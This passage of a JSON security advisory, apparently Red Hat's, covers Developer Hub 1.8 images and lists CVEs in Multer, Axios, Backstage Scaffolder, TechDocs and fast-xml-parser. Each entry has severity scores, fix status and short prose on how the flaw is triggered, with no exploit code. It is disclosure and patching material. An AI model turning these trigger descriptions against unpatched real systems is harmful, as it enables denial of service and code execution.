"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "multer: Multer: Denial of Service via dropped file upload connections"
},
{
"cve": "CVE-2026-3304",
"cwe": {
"id": "CWE-459",
"name": "Incomplete Cleanup"
},
"discovery_date": "2026-02-27T16:01:39.674165+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2443353"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Multer, a Node.js middleware. A remote attacker could exploit this vulnerability by sending specially crafted malformed requests. This could lead to resource exhaustion, resulting in a Denial of Service (DoS) for the application using Multer.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "multer: Multer: Denial of Service via malformed requests",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-3304"
},
{
"category": "external",
"summary": "RHBZ#2443353",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443353"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-3304",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3304"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-3304",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3304"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee",
"url": "https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p",
"url": "https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p"
}
],
"release_date": "2026-02-27T15:44:37.187000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "multer: Multer: Denial of Service via malformed requests"
},
{
"cve": "CVE-2026-3520",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-03-04T17:01:43.432970+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444584"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw was found in Multer, a Node.js middleware for handling `multipart/form-data`. A remote attacker can send specially crafted malformed requests which may induce a stack overflow. This can lead to a Denial of Service (DoS) making the service unavailable.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "multer: Multer: Denial of Service via malformed requests",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-3520"
},
{
"category": "external",
"summary": "RHBZ#2444584",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444584"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-3520",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3520"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-3520",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3520"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752",
"url": "https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2",
"url": "https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2"
}
],
"release_date": "2026-03-04T16:17:18.962000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "multer: Multer: Denial of Service via malformed requests"
},
{
"cve": "CVE-2026-24046",
"cwe": {
"id": "CWE-59",
"name": "Improper Link Resolution Before File Access (\u0027Link Following\u0027)"
},
"discovery_date": "2026-01-21T23:00:53.856026+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431878"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Backstage. A symlink-based path traversal issue can be exploited in multiple Scaffolder actions and archive extraction utilities during template execution via malicious symlinks. An attacker with access to create and execute Scaffolder templates can read sensitive files, delete arbitrary files or write files outside the intended workspace, resulting in unauthorized information disclosure or system compromise.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "backstage/backend-defaults: backstage/plugin-scaffolder-backend: backstage/plugin-scaffolder-node: possible symlink path traversal in scaffolder actions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, an attacker needs to have access to create and execute Scaffolder actions, specifically the debug:log, fs:delete actions and archive extractions, limiting the exposure of this flaw. Additionally, file systems operations are constrained by the permissions of the process, limiting the impact to files that can be accessed by Backstage. Due to these reasons, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-24046"
},
{
"category": "external",
"summary": "RHBZ#2431878",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431878"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-24046",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24046"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-24046",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24046"
},
{
"category": "external",
"summary": "https://github.com/backstage/backstage/commit/c641c147ab371a9a8a2f5f67fdb7cb9c97ef345d",
"url": "https://github.com/backstage/backstage/commit/c641c147ab371a9a8a2f5f67fdb7cb9c97ef345d"
},
{
"category": "external",
"summary": "https://github.com/backstage/backstage/security/advisories/GHSA-rq6q-wr2q-7pgp",
"url": "https://github.com/backstage/backstage/security/advisories/GHSA-rq6q-wr2q-7pgp"
}
],
"release_date": "2026-01-21T22:36:30.794000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "workaround",
"details": "To mitigate this issue, consider implementing strict access controls for Backstage Scaffolder templates. Restrict the ability to create and execute Scaffolder templates to trusted users only, utilizing the Backstage permissions framework. Additionally, audit existing templates for any symlink usage and consider running Backstage within a containerized environment with a highly restricted filesystem to limit potential impact.",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "backstage/backend-defaults: backstage/plugin-scaffolder-backend: backstage/plugin-scaffolder-node: possible symlink path traversal in scaffolder actions"
},
{
"cve": "CVE-2026-25153",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"discovery_date": "2026-01-30T22:00:57.084320+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2435576"
}
],
"notes": [
{
"category": "description",
"text": "A code injection flaw has been discovered in the npm @backstage/plugin-techdocs-node library. When TechDocs is configured with `runIn: local`, a malicious actor who can submit or modify a repository\u0027s `mkdocs.yml` file can execute arbitrary Python code on the TechDocs build server via MkDocs hooks configuration.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "@backstage/plugin-techdocs-node: @backstage/plugin-techdocs-node vulnerable to arbitrary code execution via MkDocs hooks",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25153"
},
{
"category": "external",
"summary": "RHBZ#2435576",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2435576"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25153",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25153"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25153",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25153"
},
{
"category": "external",
"summary": "https://github.com/backstage/backstage/security/advisories/GHSA-6jr7-99pf-8vgf",
"url": "https://github.com/backstage/backstage/security/advisories/GHSA-6jr7-99pf-8vgf"
}
],
"release_date": "2026-01-30T21:31:58.870000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "@backstage/plugin-techdocs-node: @backstage/plugin-techdocs-node vulnerable to arbitrary code execution via MkDocs hooks"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T12:51:47+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6174"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
},
{
"cve": "CVE-2026-25896",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-02-20T22:01:59.622413+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441501"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in fast-xml-parser. A remote attacker can exploit this vulnerability by providing a specially crafted XML input. The system incorrectly interprets a dot in a DOCTYPE entity name as a regular expression wildcard during processing. This allows the attacker to bypass security measures and inject malicious scripts, resulting in Cross-Site Scripting (XSS) when the parsed output is displayed to users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "fast-xml-parser: fast-xml-parser: Cross-Site Scripting (XSS) due to improper DOCTYPE entity handling",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw has been assessed as IMPORTANT for Red Hat products. This vulnerability arises when the parsed XML output is subsequently rendered to users which requires the interaction of the user. The impact of this flaw is also limited to the user\u0027s browser context.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:2e8ed97c6e6d232f66bb81dc074b8bb2712dc54004cc565fcb1d2b43a9bb2046_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:400d642f10348a0728a624b135228714b3302f1cabc096150a340407133c54e7_amd64",
"Red Hat Developer Hub 1.8:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:72d72d0e8b67012bfaaeae0e1fbbcf8e35c74d4d6252051eabef3e9dd979d48e_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25896"
},
{
"category": "external",
"summary": "RHBZ#2441501",
